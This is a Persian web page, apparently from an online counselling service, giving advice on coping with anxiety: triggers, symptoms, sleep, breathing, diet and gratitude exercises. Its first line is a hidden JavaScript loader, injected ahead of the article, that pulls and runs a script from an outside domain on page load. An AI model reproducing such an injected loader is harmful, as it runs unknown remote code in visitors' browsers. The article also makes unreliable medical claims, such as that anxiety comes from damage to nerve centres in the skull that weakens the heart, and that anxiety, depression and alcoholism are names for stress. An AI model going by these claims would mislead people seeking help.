;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); برای درمان دلهره چه کنیم؟ چه چیزی برای درمان اضطراب خوب است؟

دلهره و روش‌های مقابله با آن

میزان پیشرفت خواندن شما

فهرست مطالب

اکثر پزشکان دلهره را ناشی از صدمه رسیدن به مراکز عصبی درون جمجمه می دانند. به دنبال این اتفاق قلب نیز به شدت دچار ضعف می شود و به آن آسیب زیادی می رسد. به یاد داشته باشید این بیماری به هیچ عنوان کشنده و خطرناک نمی باشد. برخی اوقات شما می توانید بدون اینکه داروی خاصی مصرف کنید سریعا درمان شوید. ما در این مقاله قصد داریم به بررسی دلهره و روش های مقابله با آن بپردازیم، پس با ما همراه باشید.

دلهره چیست؟

قبل از اینکه به بررسی دلهره و روش های مقابله با آن بپردازیم، باید با واژه دلهره آشنا شوید. اضطراب، افسردگی و الکلیسم نام های گوناگون استرس و دلهره هستند. یکی از بزرگ ترین و خطرناک ترین اشتباهاتی که برای مقابله با استرس می توانید انجام دهید، استفاده نمودن از نیروبخش های متفاوت برای تقویت پیام های شادی بخش به مغزتان می باشد. به عنوان مثال با این کار شما می توانید سوار الاکلنگی شوید که با آن مدام به بالا و پایین می روید که این الاکلنگ هیچ گاه نمی تواند به تعادل خاصی برسد. شما باید برای این کار استفاده از نیروبخش ها را متوقف نمایید. پس از آن  استرس خود را کاهش دهید و به بدن خود فرصت دهید تا مجددا متعادل شود.

پاسخ به سوال دلهره چیست؟

آیا دلهره مسئله پیچیده ای محسوب می شود؟

دلهره و روش های مقابله با آن به هیچ عنوان پیچیده نیست. به یاد داشته باشید برخی اوقات در اثر فکر و خیال های فراوان درگیر استرس و دلهره می شوید. پر بودن دستگاه گوارش و فرم نادرست غذا خوردن می تواند دلهره را تشدید کند. به یاد داشته باشید هر چقدر بدن ضعف بیشتری داشته باشد روحیه فرد درگیر ضعف می شود. به همین خاطر بیماری به صورت واضح در فرد ایجاد می شود. تنهایی برای افرادی که درگیر دلهره هستند بسیار زبان آور و مضر می باشد، زیرا فکر و خیال افزایش می یابد. برخی اوقات دانشجویان در ایام امتحانات درگیر دلهره و اضطراب می شوند.

آشنایی با دلهره و روش های مقابله با آن

در این بخش قرار است به دلهره و روش های مقابله با آن بپردازیم:

  • شما باید مسائل خود را به صورت جداگانه و با دقت زیاد بررسی نمایید.
  • به یاد داشته باشید اگر نتوانستید در کاری که دوست دارید به موفقیت برسید از راه های دیگر نیز کمک بگیرید و آنها را با خیال راحت و آسوده امتحان کنید.
  • شما باید اقدامات و برنامه های خود را با حوصله بررسی نمایید.
  • از دوستان و عزیزانتان بخواهید در مورد کارهایی که انجام داده اید نظر دهند. به بیان دیگر درباره کارهای خود با آنها مشورت نمایید.
  • شما باید حتما تمام راه حل های مثبت ذهن خود را عملی نمایید.
  • برای حل مشکلات خود به صورت دقیق برنامه ریزی نمایید.
  • شما باید یک لیست از نتایج مثبت و منفی اقدامات احتمالی برای خود تهیه نمایید و طبق آن شروع کنید.
  • شما باید ببینید در رابطه با دلهره و روش های مقابله با آن حاضر هستید چه تغییراتی در خودتان ایجاد نمایید و برای حل آن چه خطراتی را با جان و دل می پذیرید.
  • به خودتان توضیح دهید که چرا نتوانستید به موفقیت برسید و چرا تلاش شما برای برطرف کردن مشکل هایتان بی ثمر بوده است.
  • شما باید به خودتان به صورت دقیق توضیح دهید که برای مواجه با این مشکل چه اقداماتی انجام داده اید.
  • به طور دقیق مشخص نمایید آیا واقعا قصد دارید از ناراحتی تان درباره این موضوع چیزی کم شود یا خیر؟
  • شما باید مشخص نمایید آیا تلاش کرده اید با این موضوع روبرو شوید یا همیشه سعی کرده اید از آن فرار کنید.
  •  
  اختلال پرشنوایی چیست؟

چرا دلهره می گیریم؟

ما در بخش قبل به صورت کامل به دلهره و روش های مقابله با آن پرداختیم. در این بخش به سوال چرا دلهره می گیریم؟ پاسخ می دهیم. دلهره می تواند با یک محرک خاص فعال شود. این محرک می تواند به یک تصویر ذهنی یا یک موقعیت خاص مربوط شود. بیشتر مردم از محرک های خود اطلاعی ندارند، به همین خاطر وقتی درگیر دلهره می شوند فکر می کنند هیچ دلیلی پشت آن نبوده است. به یاد داشته باشید بدن هر فردی یک سیستم جنگ و گریز دارد و زمانی که با عوامل تهدیدکننده و خطرناک روبرو می شود سیستم سمپاتیک در مغز آنها فعال می شود. گاهی اوقات ممکن است فردی در حال سخنرانی بسیار عادی به نظر برسد، اما درون وی آتش های استرس و دلهره شعله ور می شوند.

اصلی ترین نشانه های دلهره

از مهم ترین نشانه های دلهره می توان به موارد زیر اشاره نمود:

  • اختلال در خواب مانند دیر به خواب رفتن یا کیفیت خواب به شدت نامناسب
  • درد های شدید عضلانی
  • ناتوانی در تمرکز کردن
  • بی رمقی و خستگی زیاد
  • زود رنجی و بی قراری شدید
  • اضطراب و تشویش

وقتی دلهره داریم چه کنیم؟

دلهره و روش های مقابله با آن بسیار زیاد می باشد. به یاد داشته باشید بهترین گزینه درمان این مشکل رفتار خود فرد می باشد. ما در ادامه قصد داریم به روش های مقابله با دلهره به صورت کامل تر بپردازیم:

  • شما باید سعی کنید در تیم های حمایتی یا خیریه ها شرکت نمایید. علاوه بر این شما می توانید به صورت داوطلبانه نیز به دیگران یاری رسانید.
  • نشانه های اضطرابی خود را به صورت دقیق یادداشت نمایید. شما می توانید با دوستان خود نیز در بیشتر مواقع گفتگو نمایید. گاهی اوقات صحبت کردن با یک دوست می توانید دلهره را کاهش دهد. شما می توانید با مراجعه به صفحه مشاوره آنلاین از خدمات این مرکز به طور کامل بهره مند شوید.
  • برای خودتان برنامه ریزی دقیق روزانه داشته باشید. افرادی که بیکار هستند یا بیش از اندازه کار می کنند نسبت به بقیه اضطراب بیشتری دارند.
  • سعی کنید از مصرف شکلات و کافئین پرهیز نمایید.

راه های درمان دلهره یا دلشوره

ما در بخش های قبل دلهره و روش های مقابله با آن را بررسی نمودیم. در این بخش به راه های درمان دلشوره یا دلهره می پردازیم. به یاد داشته باشید در مواقعی که درگیر استرس و دلهره هستید بهترین گزینه استفاده از حواس پنجگانه می باشد که حواستان به هیچ عنوان پرت نشود. به عنوان مثال می توانید فیلمی را که دوست دارید تماشا نمایید. علاوه بر این شما می توانید تصویر کسی را که عاشقش هستید را در خیال خود تصور نمایید. کسانی که درگیر دلشوره هستند می توانند غلط ترین حالت هر رخدادی را به ذهن خود وارد کنند. پس از آن شروع به ساختن تصویرسازی منفی کنند. ما به شما توصیه می کنیم اگر درگیر دلهره یا دلشوره هستید، به اتفاقات پیش رو با دید مثبت نگاه کنید. برای این کار بهتر است راه حل های زیر را قدم به قدم انجام دهید:

  • در یک مکان به صورت آرام و آسوده دراز بکشید. سعی کنید چشمان خود را بسته نگه دارید.
  • با خودتان فکر کنید که چقدر امتحان امروز عالی پیش می رود و چقدر شما بابت این اتفاق پر از حس خوب خواهید شد. شما باید این حالت را با همه وجود خود تصور نمایید.
  • پس از آن تصور کنید امتحان تمام شده است و نتیجه امتحان رضایت بخش می باشد. این تمرین می تواند به شما کمک کند تا یک ذهنیت آرام و مثبتی نسبت به اتفاقات پیش رو داشته باشید. پس از آن اعتماد به نفس شما نسبت به خودتان نیز بیشتر می شود.
  علت استرس بي‌دليل ؛ چرا گاهي استرس الكي دارم ؟

برای درمان دلهره چه کنیم؟

در این بخش قرار است به برای درمان دلهره چه کنیم؟ سوال پاسخ دهیم.:

راه حل های مهم برای درمان دلهره

در ادامه به مهم ترین راه حل های درمان دلهره می پردازیم

  • برای درمان دلهره باید خواب خوبی داشته باشید. اگر خواب شما نامناسب باشد پیامدهای نامناسبی به دنبال دارد. به یاد داشته باشید کمبود خواب علاوه بر تاثیر گذاشتن بر سلامت جسمانی، موجب تشدید استرس و اضطراب نیز می شود. در مواقعی که درگیر دلهره هستید باید حتما 7 تا 9 ساعت استراحت داشته باشید. پس از آن متوجه می شوید که خواب و یک استراحت مناسب چقدر اضطراب و دلهره شما را کاهش می دهد.
  • شما باید سعی کنیم ذهن خود را منسجم کنید و به آن نظم ببخشید. شما باید سعی کنید بیست دقیقه از روز تمرین کنید تا دلهره تان کاهش یابد. اگر بتوانید به ذهن خود نظم ببخشید پس از آن متوجه کاهش دلهره و دلشوره در خودتان می شوید.
  • یکی از مهم ترین راه هایی که می تواند دلشوره و اضطراب را در شما کاهش دهد، لبخند زدن می باشد. مطالعات نشان می دهد خندیدن می تواند اضطراب را تا حد زیادی کاهش دهد. به همین خاطر بهتر است فیلم های کمدی خنده دار برای خودتان پخش کنید تا حالت های عصبی نیز در شما تا حد زیادی کاهش یابد.

درمان دلشوره

ما در این مقاله به دلهره و روش های مقابله با آن پرداختیم و آن را به طور کامل بررسی نمودیم. در ادامه به راه های درمان دلشوره می پردازیم:

  • یکی از راه هایی که به درمان دلشوره کمک می کند، تغذیه مناسب می باشد. بیشتر تحقیقات نشان می دهد مصرف امگا3 و ویتامین ب ارتباط تنگاتنگی با سلامت روان دارند. امگا 3 تا حد زیادی در کاهش اضطراب موثر می باشد.
  • یکی از مهم ترین راه هایی که به درمان دلشوره کمک می کند، تنفس می باشد. نفس های کوتاه و سطحی می توانند نشان دهنده اضطراب و استرس در مغز و بدن باشند. لازم به ذکر است بدانید تنفس بلند ولی آگاهانه می تواند مغز را تشویق کند که از اضطراب دوری کند.

مهم ترین راه برای درمان دلشوره

یکی از مهم ترین راه های درمان دلشوره سپاسگزاری می باشد. تحقیقات علمی نشان می دهد سپاسگزاری می تواند اضطراب را تا حد زیادی کاهش دهد.

هنگامی که قدردان و در حال سپاسگزاری هستید حس دلشوره و استرس در شما کاسته می شود.  

Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.